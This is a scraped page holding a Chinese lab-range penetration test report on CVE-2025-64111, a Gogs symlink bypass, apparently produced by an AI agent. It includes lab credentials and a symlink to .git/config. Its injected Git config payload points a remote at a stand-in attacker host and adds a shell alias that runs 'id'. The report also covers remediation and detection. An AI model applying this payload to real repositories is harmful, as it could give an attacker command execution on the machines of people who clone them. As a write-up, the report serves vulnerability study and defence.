春秋云境:CVE-2025-64111
CVE-2025-64111Gogs 符号链接绕过漏洞测试本报告由OpenClaw Agent创作从测试到报告编写都由Agent编写测试目标: http://8.147.132.32:38529测试时间: 2026-03-09测试账号: gogs_admin / admin123漏洞类型: 符号链接绕过导致潜在 RCE一、漏洞介绍1.1 漏洞概述CVE-2025-64111 是 GogsGo Git Service中的一个符号链接绕过漏洞。Gogs 是一款使用 Go 语言开发的开源自托管 Git 服务平台主打轻量化与易部署广泛应用于个人及小型团队的私有代码托管场景。攻击者可通过以下方式利用该漏洞在仓库中创建符号链接文件指向.git/config配置文件通过 Web UI 编辑该符号链接文件时实际修改 Git 配置文件在配置文件中注入恶意sshCommand参数或 Git 别名当用户执行 Git 相关操作时触发远程命令执行1.2 影响范围受影响产品: Gogs 自托管 Git 服务漏洞危害: 远程命令执行 (RCE)利用条件: 需要仓库写入权限二、环境搭建2.1 目标信息项目值目标地址http://8.147.132.32:38529服务类型Gogs Git 服务测试账号gogs_admin测试密码admin1232.2 目标首页图 2-1: Gogs 服务首页三、测试过程3.1 登录系统访问登录页面http://8.147.132.32:38529/user/login图 3-1: Gogs 登录页面使用凭证gogs_admin / admin123成功登录。3.2 Dashboard 界面登录成功后进入 Dashboard可见目标仓库final_test图 3-2: Dashboard 界面提交历史显示de3755744a- Add malicious config symlink (18 分钟前)e5666418de- Remove old symlink14324cda53- Add symlink3.3 仓库文件列表访问仓库http://8.147.132.32:38529/gogs_admin/final_test/src/master图 3-3: 仓库文件列表发现可疑文件README.md- 初始文件malicious_config- 恶意配置文件符号链接3.4 符号链接文件内容访问malicious_config文件图 3-4: malicious_config 文件内容文件内容显示.git/config这证实了该文件是一个符号链接指向 Git 配置文件。3.5 文件编辑页面访问编辑页面http://8.147.132.32:38529/gogs_admin/final_test/_edit/master/malicious_config图 3-5: 文件编辑页面可以通过 Web UI 直接编辑符号链接指向的目标文件内容。四、漏洞验证4.1 Git Clone 测试在客户端执行 Git clone 操作$gitclone http://8.147.132.32:38529/gogs_admin/final_test.git Cloning intoshot_clone...4.2 符号链接验证Clone 后检查文件结构$ls-latotal8drwxr-xr-x1root root58Mar816:10.drwxrwxrwt1root root1750Mar816:10..drwxr-xr-x1root root122Mar816:10 .git -rw-r--r--1root root7Mar816:10 README.md lrwxrwxrwx1root root11Mar816:10 malicious_config -.git/config$filemalicious_config malicious_config: symboliclinkto .git/config4.3 配置文件内容读取符号链接实际内容$catmalicious_config[core]repositoryformatversion0filemodetruebarefalselogallrefupdatestrue[remoteorigin]urlhttp://8.147.132.32:38529/gogs_admin/final_test.git fetchrefs/heads/*:refs/remotes/origin/*[branchmaster]remoteorigin mergerefs/heads/master五、利用尝试5.1 恶意 Payload 构造尝试注入恶意 Git 配置[core] repositoryformatversion 0 filemode true bare false [remote origin] url ssh://attacker.com/repo [alias] test !id /tmp/PWNED5.2 利用结果测试项状态说明符号链接创建✅已存在指向.git/config的符号链接文件编辑✅可通过 Web UI 编辑Git Clone✅可成功 clone 仓库RCE 触发❌未成功执行命令5.3 分析符号链接行为: Clone 后符号链接指向客户端本地的.git/config服务器端限制: Gogs 使用 bare 仓库服务器端无.git/config文件实际风险: 主要针对 clone 仓库的客户端而非服务器端六、修复建议6.1 服务端修复禁止符号链接: Gogs 应禁止上传符号链接文件路径验证: 检查上传文件路径阻止.git/相关路径内容过滤: 检测提交内容中的 Git 配置注入权限控制: 限制仓库文件编辑权限6.2 客户端防护Git 配置: 设置core.symlinksfalse禁用符号链接仓库来源: 仅 clone 受信任的仓库安全审计: 定期检查.git/config完整性6.3 检测规则# 检测仓库中的符号链接find.-typel-name*config*# 检查 .git/config 完整性gitconfig--list--show-origin七、总结7.1 漏洞评级评级项等级说明漏洞存在性⚠️ 部分确认符号链接存在但利用受限利用难度中等需要仓库写入权限影响范围中等主要影响客户端危害程度高潜在 RCE7.2 结论CVE-2025-64111 是一个针对 Gogs 的符号链接绕过漏洞。本次测试确认了✅ 目标 Gogs 服务存在符号链接文件malicious_config - .git/config✅ 可通过 Web UI 编辑符号链接指向的内容✅ Git clone 后符号链接指向客户端本地.git/config❌ 服务器端 RCE 未成功触发bare 仓库限制主要风险: 攻击者可通过恶意仓库影响 clone 该仓库的客户端而非服务器端。报告生成时间2026-03-09 00:15 CST测试人员piqiu (皮球) ⚽️

相关新闻

入行网安是天坑吗???

入行网安是天坑吗???

为什么说网络安全不是天坑?2026年入行网安全攻略(必读收藏) 网络安全并非"天坑",而是国家战略级黄金赛道。政策支持力度空前,2024年人才缺口达327万,薪资远超普通IT岗位,起薪15-25K&…

2026/6/30 19:09:52 阅读更多 →
网络安全专业越来越香,就业前景特别好,但有些人不能学

网络安全专业越来越香,就业前景特别好,但有些人不能学

前言 随着互联网技术的发展,我们生活中的方方面面已经离不开网络。网络在给我们生活带来方便的同时,也给我们的隐私和个人财产安全,带来了隐患,信息安全变得越来越重要。 任何专业都是因为他有社会需求才会变成热门专业&#xf…

2026/7/4 11:03:49 阅读更多 →
25岁成功转行网络安全。直到现在。从未后悔,反而感谢当初果断的自己。

25岁成功转行网络安全。直到现在。从未后悔,反而感谢当初果断的自己。

24岁开始为转行做准备,25岁成功转行。直到现在。从未后悔,反而感谢当初果断的自己。 一、转行的起因 我是一个崇尚个人兴趣和职业相结合的人。2015年机械专业普通大专毕业,如今回头看去,已经9年过去了,真的感慨时间的…

2026/7/3 8:09:36 阅读更多 →

最新新闻

构建高质量操作指南数据集与大模型优化实践

构建高质量操作指南数据集与大模型优化实践

1. 项目背景与核心价值 去年我在处理一个企业知识库项目时,发现现有AI助手在"教人做事"类任务上表现糟糕——要么漏掉关键步骤,要么逻辑混乱。这促使我启动了一个大规模研究:从全网抓取98万份操作指南类网页,清洗后得到…

2026/7/4 14:07:59 阅读更多 →
基于改进YOLOv8的电子废物智能分拣系统开发

基于改进YOLOv8的电子废物智能分拣系统开发

## 1. 项目背景与核心价值电子废物(E-waste)已成为全球增长最快的固体废弃物类型。根据国际电信联盟数据,2023年全球电子废物总量突破6000万吨,但正规回收率不足20%。这个现象背后隐藏着两个关键问题: 1. 有害物质&…

2026/7/4 14:05:58 阅读更多 →
一键下载中小学电子课本:告别网络依赖的智能工具

一键下载中小学电子课本:告别网络依赖的智能工具

一键下载中小学电子课本:告别网络依赖的智能工具 【免费下载链接】tchMaterial-parser 国家中小学智慧教育平台 电子课本下载工具,帮助您从智慧教育平台中获取电子课本的 PDF 文件网址并进行下载,让您更方便地获取课本内容。 项目地址: htt…

2026/7/4 14:05:58 阅读更多 →
2025主流开源AI UI选型指南:OpenWebUI、Ollama WebUI等四大工具实测

2025主流开源AI UI选型指南:OpenWebUI、Ollama WebUI等四大工具实测

1. 项目概述:当AI能力不再被代码门槛锁死“No Code, No Limits”不是一句营销口号,而是我过去18个月在十几个真实业务场景里反复验证的一条技术路径——从为本地社区诊所搭建症状初筛助手,到帮独立设计师快速生成品牌视觉草稿,再到…

2026/7/4 14:05:58 阅读更多 →
Spring Security OAuth2实战:手把手搭建认证服务器与资源服务器(JWT+密码模式)

Spring Security OAuth2实战:手把手搭建认证服务器与资源服务器(JWT+密码模式)

引言 在现代微服务架构中,安全认证与授权是绕不开的话题。OAuth2 作为业界标准的授权协议,能够帮助我们实现第三方应用授权、单点登录以及资源保护。Spring Security 提供了对 OAuth2 的一流支持,使得开发者可以快速构建符合标准的认证与资源…

2026/7/4 14:03:58 阅读更多 →
Java ECC加密报错InvalidKeyException解析:加密与签名的本质区别

Java ECC加密报错InvalidKeyException解析:加密与签名的本质区别

1. 项目概述:当“私钥加密,公钥解密”遇上ECC 最近在调试一个Java项目,用到了椭圆曲线加密(ECC)。我本想实现一个“私钥签名,公钥验签”之外的场景——尝试用私钥加密一段数据,然后用公钥去解密…

2026/7/4 13:59:35 阅读更多 →

日新闻

Memcached 1.6.43 发布:关键安全修复版本,多项问题得到解决

Memcached 1.6.43 发布:关键安全修复版本,多项问题得到解决

Memcached 1.6.43 正式发布,这是一个关键的安全修复版本,修复了多个方面的问题,还对部分功能进行了优化。 安全修复亮点 此次发布在安全修复上表现突出。binprot 避免了项目引用计数溢出,mcmc 因安全问题提升了上游版本号&#xf…

2026/7/4 0:04:29 阅读更多 →
终极指南:使用HMCL启动器跨平台畅玩Minecraft的完整解决方案

终极指南:使用HMCL启动器跨平台畅玩Minecraft的完整解决方案

终极指南:使用HMCL启动器跨平台畅玩Minecraft的完整解决方案 【免费下载链接】HMCL A Minecraft Launcher which is multi-functional, cross-platform and popular 项目地址: https://gitcode.com/gh_mirrors/hm/HMCL HMCL(Hello Minecraft! Lau…

2026/7/4 0:06:29 阅读更多 →
KMX63与PIC18F66K40在嵌入式HMI中的硬件协同与低功耗设计

KMX63与PIC18F66K40在嵌入式HMI中的硬件协同与低功耗设计

1. KMX63与PIC18F66K40的硬件协同架构解析KMX63作为一款三轴加速度计和磁力计组合传感器,与PIC18F66K40微控制器的搭配堪称嵌入式HMI开发的黄金组合。这套硬件组合的核心优势在于KMX63提供的高精度运动感知能力与PIC18F66K40强大的信号处理能力形成了完美互补。KMX6…

2026/7/4 0:06:29 阅读更多 →

周新闻

月新闻